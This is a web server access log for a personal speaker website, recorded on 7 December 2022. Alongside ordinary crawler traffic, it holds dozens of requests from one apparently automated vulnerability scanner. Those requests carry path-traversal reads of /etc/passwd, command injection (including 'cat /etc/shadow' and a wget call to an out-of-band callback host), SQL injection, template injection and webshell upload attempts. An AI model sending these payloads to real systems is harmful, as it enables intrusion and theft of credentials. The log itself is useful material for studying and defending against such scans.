66.249.66.81 - - [07/Dec/2022:16:00:17 -0800] "GET /contact HTTP/1.1" 200 4154 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.110 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:16:11:39 -0800] "POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:11:43 -0800] "POST /lucee/admin/imgProcess.cfm?file=/../../../context/2IbagnOjYSxwz49pSfXTrNPOKVb.cfm HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:11:46 -0800] "POST /lucee/2IbagnOjYSxwz49pSfXTrNPOKVb.cfm HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
185.174.159.245 - - [07/Dec/2022:16:12:25 -0800] "GET /contact/ HTTP/1.1" 200 17847 "https://mikemarino.us/contact/" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "mikemarino.us"
185.174.159.245 - - [07/Dec/2022:16:12:26 -0800] "GET /contact/ HTTP/1.1" 200 17847 "https://mikemarino.us/contact/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "mikemarino.us"
185.174.159.245 - - [07/Dec/2022:16:12:27 -0800] "GET /contact HTTP/1.1" 200 17847 "https://mikemarino.us/contact" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "mikemarino.us"
185.174.159.245 - - [07/Dec/2022:16:12:27 -0800] "GET /contact/ HTTP/1.1" 200 17847 "https://mikemarino.us/contact/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "mikemarino.us"
185.174.159.245 - - [07/Dec/2022:16:12:27 -0800] "GET /contact/ HTTP/1.1" 200 17847 "https://mikemarino.us/contact/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "mikemarino.us"
185.174.159.245 - - [07/Dec/2022:16:12:27 -0800] "GET /contact/ HTTP/1.1" 200 17847 "https://mikemarino.us/contact/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "mikemarino.us"
185.174.159.245 - - [07/Dec/2022:16:12:27 -0800] "GET /contact HTTP/1.1" 200 17847 "https://mikemarino.us/contact" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "mikemarino.us"
185.174.159.245 - - [07/Dec/2022:16:12:27 -0800] "GET /contact/ HTTP/1.1" 200 17847 "https://mikemarino.us/contact/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "mikemarino.us"
185.174.159.245 - - [07/Dec/2022:16:12:27 -0800] "GET /contact/ HTTP/1.1" 200 17847 "https://mikemarino.us/contact/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "mikemarino.us"
185.174.159.245 - - [07/Dec/2022:16:12:28 -0800] "GET /contact HTTP/1.1" 200 17847 "https://mikemarino.us/contact" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "mikemarino.us"
185.174.159.245 - - [07/Dec/2022:16:12:28 -0800] "GET /contact HTTP/1.1" 200 17847 "https://mikemarino.us/contact" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "mikemarino.us"
185.174.159.245 - - [07/Dec/2022:16:12:28 -0800] "GET /contact HTTP/1.1" 200 17847 "https://mikemarino.us/contact" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "mikemarino.us"
185.174.159.245 - - [07/Dec/2022:16:12:28 -0800] "GET /contact HTTP/1.1" 200 17847 "https://mikemarino.us/contact" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "mikemarino.us"
185.174.159.245 - - [07/Dec/2022:16:12:28 -0800] "GET /contact HTTP/1.1" 200 17847 "https://mikemarino.us/contact" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "mikemarino.us"
176.58.117.149 - - [07/Dec/2022:16:18:56 -0800] "GET / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:16:26:02 -0800] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=2IbagobYzhFDvHFCYp5xLg7asYB.php:aaa HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:27:44 -0800] "POST /cgi-bin/login.cgi HTTP/1.1" 404 88 "https://mikemarino.us.p9.hostingprod.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:27:48 -0800] "POST /cgi-bin/system_log.cgi HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
185.100.86.121 - - [07/Dec/2022:16:38:13 -0800] "GET / HTTP/1.1" 200 4548 "http://mikemarino.us" "Mozilla/5.0 (iPad; CPU OS 12_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:16:39:34 -0800] "GET /ucmdb-api/connect HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:41:39 -0800] "POST /RPC2_Login HTTP/1.1" 404 88 "https://mikemarino.us.p9.hostingprod.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:42:00 -0800] "GET /?id=nuclei%25{128*128} HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:42:20 -0800] "POST /login.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:42:37 -0800] "POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:42:38 -0800] "POST /password_change.cgi HTTP/1.1" 404 88 "https://mikemarino.us.p9.hostingprod.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:42:41 -0800] "GET /apisix/admin/migrate/export HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:42:50 -0800] "GET /InsightPluginShowGeneralConfiguration.jspa HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:42:54 -0800] "POST /api.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:42:56 -0800] "POST /index.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:43:02 -0800] "POST /actions/authenticate.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:45:20 -0800] "POST /boardDataWW.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
185.220.101.33 - - [07/Dec/2022:16:45:28 -0800] "GET /contact/ HTTP/1.1" 200 17847 "https://mikemarino.us/contact/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "mikemarino.us"
185.220.101.33 - - [07/Dec/2022:16:45:29 -0800] "GET /contact HTTP/1.1" 200 17847 "https://mikemarino.us/contact" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "mikemarino.us"
114.119.149.134 - - [07/Dec/2022:16:51:09 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.mikemarino.us"
147.182.222.20 - - [07/Dec/2022:16:57:52 -0800] "GET /wp-content/plugins/wpcargo/includes/2IbagoVtZX0f1abVRoDrwzzXfj6.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:57:56 -0800] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2IbagoVtZX0f1abVRoDrwzzXfj6.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:58:00 -0800] "POST /wp-content/plugins/wpcargo/includes/2IbagoVtZX0f1abVRoDrwzzXfj6.php?1=var_dump HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:58:12 -0800] "POST /apply_sec.cgi HTTP/1.1" 404 88 "https://mikemarino.us.p9.hostingprod.com" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:58:16 -0800] "POST /apply_sec.cgi HTTP/1.1" 404 88 "https://mikemarino.us.p9.hostingprod.com/login_pic.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:16:58:20 -0800] "POST /apply_sec.cgi HTTP/1.1" 404 88 "https://mikemarino.us.p9.hostingprod.com/login_pic.asp" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:09:37 -0800] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:09:41 -0800] "GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
44.204.139.28 - - [07/Dec/2022:17:11:25 -0800] "GET /robots.txt HTTP/1.1" 200 59 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" "mikemarino.us"
44.204.139.28 - - [07/Dec/2022:17:11:25 -0800] "GET / HTTP/1.1" 200 19827 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:17:13:04 -0800] "GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:13:07 -0800] "GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
157.55.39.16 - - [07/Dec/2022:17:14:10 -0800] "GET /sitemap.xml HTTP/1.1" 200 832 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "mikemarino.us"
111.240.203.249 - - [07/Dec/2022:17:17:37 -0800] "GET /contact/ HTTP/1.1" 200 17847 "https://mikemarino.us/contact/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49" "mikemarino.us"
111.240.203.249 - - [07/Dec/2022:17:17:39 -0800] "GET /contact HTTP/1.1" 200 17847 "https://mikemarino.us/contact" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:17:25:13 -0800] "GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:26:54 -0800] "GET /tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:27:34 -0800] "GET /password.jsn HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:27:56 -0800] "POST /run HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:28:10 -0800] "POST /login.action HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:28:12 -0800] "POST /context.json HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:28:15 -0800] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:28:22 -0800] "POST /getcfg.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:28:29 -0800] "GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://ce8hcsnmqs0tn2g00010fiwh98b7pbx3o.oast.live;%27 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:28:42 -0800] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:28:53 -0800] "POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:28:57 -0800] "GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:29:01 -0800] "POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:29:05 -0800] "GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:30:44 -0800] "GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
51.159.37.145 - - [07/Dec/2022:17:43:59 -0800] "GET /wp-includes/ HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "mikemarino.us"
51.222.253.6 - - [07/Dec/2022:17:49:44 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "mikemarino.us"
51.222.253.1 - - [07/Dec/2022:17:49:46 -0800] "GET / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "mikemarino.us"
51.222.253.4 - - [07/Dec/2022:17:49:58 -0800] "GET /yahoo_site_admin/assets/images/mm2022enahnce.6981543.jpg HTTP/1.1" 200 37675 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "mikemarino.us"
95.163.255.198 - - [07/Dec/2022:17:52:42 -0800] "GET /robots.txt HTTP/1.1" 200 59 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +https://help.mail.ru/webmaster/indexing/robots)" "mikemarino.us"
95.163.255.131 - - [07/Dec/2022:17:53:24 -0800] "GET / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/Robots/2.0; +https://help.mail.ru/webmaster/indexing/robots)" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:17:57:59 -0800] "POST /classes/Login.php?f=login HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:58:03 -0800] "GET / HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:59:07 -0800] "POST /api/jsonws/invoke HTTP/1.1" 404 88 "https://mikemarino.us.p9.hostingprod.com/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:17:59:10 -0800] "POST /api/jsonws/invoke HTTP/1.1" 404 88 "https://mikemarino.us.p9.hostingprod.com/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
114.119.146.18 - - [07/Dec/2022:18:04:55 -0800] "GET /speaker/managing_workplace_stress__conflict HTTP/1.1" 200 5764 "https://mikemarino.us/speaker/addictions_-_from_heartbreak_to_hope_galafundraising_keynote" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "mikemarino.us"
114.119.143.5 - - [07/Dec/2022:18:06:22 -0800] "GET /speaker HTTP/1.1" 200 4630 "https://mikemarino.us/speaker/addictions_-_from_heartbreak_to_hope_galafundraising_keynote" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "mikemarino.us"
64.124.8.47 - - [07/Dec/2022:18:08:52 -0800] "GET /robots.txt HTTP/1.1" 200 73 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
64.124.8.47 - - [07/Dec/2022:18:08:52 -0800] "GET /speaker/the_freedom_from_anxiety__depression_seminar HTTP/1.1" 200 8405 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "mikemarino.us"
147.182.222.20 - - [07/Dec/2022:18:09:35 -0800] "GET /?author=1 HTTP/1.1" 200 19827 "-" "-" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:10:49 -0800] "GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:11:15 -0800] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:11:41 -0800] "GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:14:01 -0800] "GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
147.182.222.20 - - [07/Dec/2022:18:14:02 -0800] "POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36" "mikemarino.us.p9.hostingprod.com"
